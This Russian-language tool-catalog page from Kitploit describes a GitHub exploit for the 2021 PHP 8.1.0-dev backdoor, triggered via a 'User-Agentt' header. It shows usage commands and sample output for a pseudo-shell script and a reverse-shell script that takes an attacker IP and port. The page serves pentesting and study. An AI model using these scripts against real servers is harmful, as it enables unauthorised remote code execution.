Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
php-8.1.0-dev-backdoor-rce — PHP 8.1.0-dev Backdoor System Shell Script | Kitploit
Инструменты/GitHubGitHub/flast101/php-8.1.0-dev-backdoor-rce
ExploitationWeb Application ExploitationPenetration TestingRed TeamingRemote Access Tool
GitHubflast101/php-8.1.0-dev-backdoor-rce

php-8.1.0-dev-backdoor-rce

PHP 8.1.0-dev Backdoor System Shell Script

Репозиторий
94215 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

PHP 8.1.0-dev: бэкдор удалённого выполнения кода

Скрипт системной оболочки для бэкдора PHP 8.1.0-dev

docs/logo_php81.png

Версия PHP 8.1.0-dev была выпущена с бэкдором 28 марта 2021 года, но бэкдор был быстро обнаружен и удалён. Если эта версия PHP работает на сервере, злоумышленник может выполнить произвольный код, отправив заголовок User-Agentt.

После обнаружения проблемы исходный код был восстановлен, но затем его снова модифицировали. Взлом мог создать бэкдор на любых сайтах, где работала скомпрометированная версия PHP, что позволяло хакерам выполнять удалённый код на сайте.

Читать полную статью: https://flast101.github.io/php-8.1.0-dev-backdoor-rce/


POC-скрипт

Этот короткий эксплойт-скрипт backdoor_php_8.1.0-dev.py использует бэкдор для предоставления псевдо-системной оболочки на хосте. Найдите его на Exploit DB.

  • Название эксплойта: PHP 8.1.0-dev Backdoor Remote Code Execution
  • Дата: 23 мая 2021
  • Автор эксплойта: flast101
  • Сайт производителя: https://www.php.net/
  • Ссылка на ПО: https://github.com/vulhub/vulhub/tree/master/php/8.1-backdoor
  • Протестировано на версии: 8.1.0-dev
  • CVE : N/A
  • Ссылки по уязвимости:
    https://github.com/php/php-src/commit/2b0f239b211c7544ebc7a4cd2c977a5b7a11ed8a
    https://github.com/vulhub/vulhub/blob/master/php/8.1-backdoor/README.zh-cn.md

Использование:

root@kitploit:~
┌──(user㉿kali)-[~/Documents]
└─$ python3 backdoor_php_8.1.0-dev.py
  
Enter the host url:
http://a.b.c.d

Interactive shell is opened on http://a.b.c.d 
Can't acces tty; job crontol turned off.
$ id
uid=1000(user) gid=1000(user) groups=1000(user)

Обратная оболочка

Этот короткий эксплойт-скрипт revshell_php_8.1.0-dev.py предоставляет обратную оболочку на целевой системе.

Использование:

root@kitploit:~
┌──(user㉿kali)-[~/Documents]
└─$ python3 revshell_php_8.1.0-dev.py <target URL> <attacker IP> <attacker PORT>

docs/revshell-script.png

Будьте любознательными, обучение — это жизнь! 😃

Скачать инструмент